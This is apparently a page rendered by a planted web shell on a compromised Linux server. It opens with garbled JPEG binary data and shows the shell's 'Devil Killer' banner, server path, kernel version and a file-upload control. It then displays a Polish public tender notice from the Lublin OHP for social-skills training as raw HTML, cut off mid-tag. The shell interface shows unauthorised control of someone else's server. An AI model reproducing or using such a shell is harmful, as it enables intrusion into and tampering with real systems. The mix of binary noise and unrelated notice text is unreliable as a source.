JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251030/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251030/0050733901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie szkolenia w zakresie<br/>umiejętności i kompetencji społecznych, zgodnie z klasyfikacją ESCO wraz z wyżywieniem w ramach projektu projektu „Kompas Kariery” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Lubelska Wojewódzka Komenda Ochotniczych Hufców Pracy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Lubelska WK OHP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 007003467</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 14c</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 524 51 08</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@lubelska.ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ohplublin.bip.e-zeto.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie szkolenia w zakresie<br/>umiejętności i kompetencji społecznych, zgodnie z klasyfikacją ESCO wraz z wyżywieniem w ramach projektu projektu „Kompas Kariery” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6f54ffd5-a82f-478c-ba57-3ba3a23aaf84</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00507339</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Kompas Kariery - Działanie FELU.09.08 Aktywizacja zawodowa projekty OHP </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6f54ffd5-a82f-478c-ba57-3ba3a23aaf84 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">.Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych<br/>w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem<br/>„Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań<br/>i zawiadomień, zadawanie pytań i udzielanie odpowied zi. Formularze do<br/>komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”). https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>pu blicznego musi posiadać konto podmiotu „Wykonawca” na Platformie<br/>e Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz<br/>zasady i warunki korzystania z Platformy e Zamówienia określa Regulamin<br/>Platformy e Zamówienia, dostępny na stroni e internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do<br/>komunikacji” wynosi 150 MB (wielkość ta d otyczy plików przesyłanych jako<br/>załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu<br/>korzystania z usług Platformy e Zamówienia oraz informacje dotyczące<br/>specyfikacji połączenia określa Regulamin Platformy e Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizyczn ych w związku<br/>z przetwarzaniem danych osobow ych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz.<br/>UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>18.1.1. Ad ministratorem Pani/Pana danych osobowych jest Wojewódzki Komendant<br/>Ochotniczych Hufców Pracy w Lublinie; dane adresowe: ul. 1 Maja 14c, 20 410<br/>Lublin.<br/>18.1.2. Wyznaczyliśmy inspektora ochrony danych, z którym może Pani/Pan<br/>kontaktować się we wszystkich sprawach do tyczących przetwarzania danych<br/>osobowych oraz korzystania z praw związanych z przetwarzaniem danych poprzez:<br/>email: iod@lubelska.ohp.pl lub pisemnie na adres Administratora danych.<br/>18.1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z niniejszym postępowaniem o udzielenie zamówienia<br/>publicznego.<br/>18.1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 19 oraz art.<br/>74 76 ustawy.<br/>18.1.5. Z danych osobowych będziemy korzystać do momentu zak ończenia realizacji<br/>celu określonego w pkt 18.1.3 tj. zgodnie z art. 78 ust. 1 ustawy, przez 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia . Po tym czasie z danych<br/>będziemy korzystać przez okres oraz w zakresie wymaganym przez przepisy<br/>powszechnie obowiązującego prawa.<br/>18.1.6. Obowiązek podania pr zez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w prz episach<br/>ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy.<br/>18.1.7. Stosownie do art. 22 RODO Pana/Pani dane osobowe nie będą podlegać decyzji,<br/>która opierać się będzie wyłą cznie na zautomatyzowanym przetwarzaniu, w tym<br/>profilowaniu.<br/>18.1.8. Jeżeli LWK OHP uzna to za konieczne, ma prawo żądać udokumentowania<br/>przekazanych informacji, jak również weryfikować je w oparciu o informacje ze<br/>źródeł otwartych.<br/>18.1.9. Odbiorcami Pani/Pana danych osobowych mogą być organy, instytucje lub<br/>podmioty upoważnione z mocy obowiązujących przepisów prawa.<br/>18.1.10. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub<br/>organizacji międzynarodowej.<br/>18.1.11. Posiada Pani/Pan:<br/>18.1.11.1. na podstawie art. 15 RODO prawo dost ępu do danych osobowych<br/>Pani/Pana dotyczących,<br/>18.1.11.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych*, na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków**, o których mowa w art. 18 ust. 2 RODO,<br/>18.1.11.3. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO.<br/>18.1.12. nie przysługuje Pani/Panu:<br/>18.1.12.1. w związku z art. 17 us t. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych,<br/>18.1.12.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;<br/>18.1.12.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pa na<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">LWK.ZPM.270.07.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w zakresie<br/>umiejętności i kompetencji społecznych w danym zawodzie zgodnie z klasyfikacją ESCO<br/>wraz z wyżyw ieniem (obiad lub przerwa kawowa lub zimny bufet) w wymiarze 16 godzin<br/>dydaktycznych na grupę 10 osobową dla 25 grup w 14 miejscowościach województwa<br/>lubelskiego dla łącznej liczby 250 uczestników projektu „Kompas Kariery” Projekt<br/>realizowany w ramach Europejskiego Funduszu Społecznego Plus, Programu<br/>Regionalnego Fundusze Europejskie dla Lubelskiego, Oś priorytetowa IX Zaspokajanie<br/>potrzeb rynku pracy, Działanie FELU.09.08 Aktywizacja zawodowa projekty OHP. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najniższa oferowana cena otrzyma maksymalną liczbę punktów (80 pkt). Pozostałe oferty<br/>będą oceniane według wzoru:<br/>(Cena najniższa / Cena badana) × 80 pkt,<br/>Punkty przyznawane za zobowiązanie wykonawcy do zatrudnienia przy realizacji zamówienia co najmniej jednej osoby należącej do grupy społecznie defaworyzowanej,<br/>Ocena w tym kryterium będzie dokonana w sposób następujący:<br/>• wykonawca, który zobowiąże się do zatrudnienia co najmniej 1 osoby z ww. grup<br/>20 pkt,<br/>• wykonawca, który nie przewidzi zatrudnienia takich osób<br/>0 pkt.<br/>Wykonawca, który w ofercie zadeklaruje zatrudnienie osób z grup defaworyzowanych,<br/>zobowiązany będzie przed podpisaniem umowy do przedstawienia oświadczenia<br/>o planowanym zatrudnieniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzule społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Wykonawca winien posiadać wpis do Rejestru Instytucji<br/>Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy<br/>właściwy ze względu na siedzibę instytucji szkoleniowej.<br/>Warunek zdolności technicznej lub zawodowej, Zamawiający określa minimalne poziomy<br/>zdolności dotyczące kwalifikacji zawodowych osób skierowanych przez<br/>wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na<br/>odpowiednim poziomie jakości: a) w okresie ostatnich 3 lat zrealizowali co najmniej 2 szkolenia o tematyce<br/>zbliżonej do przedmiotu zamówienia (kompetencje społeczne,<br/>komunikacja interpersonalna, praca zespołowa, trening umiejętności<br/>miękkich itp.),<br/>b) Kierunkowe wykształcenie wyższe w zakresie: psychologia i/lub<br/>socjoterapia i/lub pedagogika i/lub która ukończyła studia podyplomowe<br/>z zakresu treningu umiejętności społecznych oraz która przeprowadziła<br/>minimum dwa warsztaty/ szkolenia/ zajęcia grupowe z zakresu<br/>umiejętności i kompetencji społecznych każde po min. 16 h<br/>dydaktycznych dla grupy min. 10 osób w ostatnich trzech latach<br/>c) dysponują kadrą umożliwiającą realizację szkoleń w co najmniej 2<br/>grupach szkoleniowych jednocześnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków<br/>udziału w postępowaniu (wg załącznika nr 2).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków<br/>udziału w postępowaniu (wg załącznika nr 2).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> wykaz usług zał. 8 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W zakresie określonym w pkt 6.2.4. co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, dysponuje wymaganą zdolnością<br/>techniczną lub zawodową i wykona usługi, do realizacji, których te zdolności są<br/>wymagane.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Oświadczenie wymagane w pkt 7.1.1.1. oraz podmiotowe środki dowodowe wymagane w pkt 7.1.1.2. (o ile zachodzi taka okoliczność) winien złożyć każdy wykonawca. Oświadczenia potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/> Oświadczenie wymagane w 7.1.1.3. oraz podmiotowe środki<br/>dowodowe wymagane w pkt 7.1.1.4. winny być złożone wspólnie przez<br/>wykonawców.<br/> Dokumenty wymagane w pkt 7.1.2.1. winien złożyć każdy wykonawca. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną <br/>w formie pisemnego aneksu pod rygorem nieważności.<br/>2.	Strony wyłączają możliwość dokonywania istotnych zmian umowy, o których mowa<br/>w art. 454 ust. 2 ustawy Prawo zamówień publicznych, z zastrzeżeniem zmian wprowadzanych na podstawie art. 455 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.<br/>3.	Strony przewidują możliwość wprowadzenia następujących zmian w umowie:<br/>1)	zmiana terminu realizacji umowy w przypadku:<br/>a)	wystąpienia sytuacji epidemiologicznej/pandemicznej uniemożliwiającej realizację przedmiotu umowy. Termin realizacji umowy zostanie zmieniony odpowiednio do czasu trwania okoliczności uniemożliwiających realizację przedmiotu umowy w terminach w niej wskazanych, oraz o czas nie zbędny do usunięcia skutków zaistniałych okoliczności, uniemożliwiających powrót do realizacji zamówienia.<br/>b)	w przypadku wystąpienia okoliczności niezależnych od Stron tj. braku możliwości uczestnictwa w usłudze uczestników z przyczyn zdrowotnych i / lub losowych. Termin realizacji umowy zostanie zmieniony o czas wystąpienia okoliczności uniemożliwiających realizację przedmiotu umowy w terminach w niej wskazanych oraz o czas nie zbędny do usunięcia skutków zaistniałych okoliczności, uniemożliwiających powrót do realizacji zamówienia.<br/>2)	zmiana sposobu wykonania umowy. Zmianie może ulec tryb realizacji usługi, jeżeli wystąpią okoliczności, o których mowa w § 12 ust. 1 pkt. 2 i 3. W przypadku zaistnienia ograniczeń <br/>w możliwości realizacji przedmiotu zamówienia w sposób zgodny z opisem przedmiotu zamówienia, Wykonawca w uzgodnieniu z Zamawiającym może zmienić sposób realizacji przedmiotu umowy, przeprowadzając szkolenie w zakresie umiejętności i kompetencji społecznych w danym zawodzie zgodnie z klasyfikacją ESCO w sposób zdalny za pośrednictwem komunikacji elektronicznej,<br/>3)	zmniejszenie zakresu przedmiotu umowy, w przypadku, gdy jego wykonanie <br/>w pierwotnym zakresie nie leży w interesie publicznym wraz z jednoczesnym zmniejszeniem wynagrodzenia za wykonanie przedmiotu umowy; zmniejszenie zakresu przedmiotu umowy w granicach uzasadnionego interesu publicznego wraz ze zmniejszeniem wynagrodzenia Wykonawcy, odpowiednio do wartości zmniejszonego zakresu zamówienia nie więcej niż 10% wartości umowy/ zakresu<br/>4)	Zmiana osoby wskazanej w § 1 ust. 4, w przypadku gdy z przyczyn niezależnych od Wykonawcy ww. osoba nie może uczestniczyć w realizacji zamówienia. Zmiana nastąpi na pisemny wniosek Wykonawcy wraz z uzasadnieniem. Niniejszej zmiany można dokonać pod warunkiem, iż nowa zaproponowana przez Wykonawcę osoba posiada tożsame kwalifikacje zawodowe i doświadczenie zawodowe co osoba wskazana w § 1 ust. 4 oraz złoży aktualne zaświadczenie dla osób fizycznych o niekaralności z Krajowego Rejestru Karnego sporządzonego nie wcześniej niż 6 miesięcy przed jej złożeniem. <br/>4.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą Stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span 